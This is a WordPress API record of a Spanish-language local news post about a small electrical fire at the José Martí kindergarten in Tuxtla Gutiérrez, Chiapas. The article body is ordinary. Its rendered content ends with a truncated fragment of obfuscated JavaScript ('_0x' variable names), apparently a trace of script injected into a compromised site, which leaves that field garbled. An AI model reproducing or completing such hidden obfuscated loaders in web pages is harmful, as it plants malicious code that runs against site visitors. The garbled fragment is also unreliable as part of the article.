{"id":15409,"date":"2024-05-03T03:07:58","date_gmt":"2024-05-03T03:07:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15409"},"modified":"2024-05-03T03:07:59","modified_gmt":"2024-05-03T03:07:59","slug":"connato-de-incendio-en-el-kinder-jose-marti","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15409","title":{"rendered":"Connato de incendio en el k\u00ednder Jos\u00e9 Mart\u00ed"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"461\" height=\"1024\" data-id=\"15410\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705347877-461x1024.jpg\" alt=\"\" class=\"wp-image-15410\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705347877-461x1024.jpg 461w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705347877-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705347877-691x1536.jpg 691w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705347877.jpg 720w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"461\" height=\"1024\" data-id=\"15411\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705350928-461x1024.jpg\" alt=\"\" class=\"wp-image-15411\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705350928-461x1024.jpg 461w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705350928-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705350928-691x1536.jpg 691w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714705350928.jpg 720w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 2 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde, se registr\u00f3 un connato de incendio en el interior del k\u00ednder Jos\u00e9 Mart\u00ed, del Barrio Santa Cecilia.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el mismo personal report\u00f3 a los cuerpos de emergencia que sal\u00eda humo de la mufa.<\/p>\n\n\n\n<p>A la 5a Oriente, entre 7a y 8a Sur arribaron elementos del cuerpo de Bomberos quienes ubicaron un fallo en el cableado del poste a la acometida.<\/p>\n\n\n\n<p>Por este fallo la energ\u00eda el\u00e9ctrica se suspendi\u00f3 por lo que tambi\u00e9n se report\u00f3 a la CFE, para verificar la situaci\u00f3n.<\/p>\n\n\n\n<p>Los elementos se retiraron y aconsejaron dar una revisi\u00f3n t\u00e9cnica a la instalaci\u00f3n que ya es vieja.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 2 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde, se registr\u00f3 un connato de incendio en el interior del k\u00ednder Jos\u00e9 Mart\u00ed, del Barrio Santa Cecilia. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el mismo personal report\u00f3 a los cuerpos de emergencia que sal\u00eda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15411,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15409","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15409","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15409"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15409\/revisions"}],"predecessor-version":[{"id":15412,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15409\/revisions\/15412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15411"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15409"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15409"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15409"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}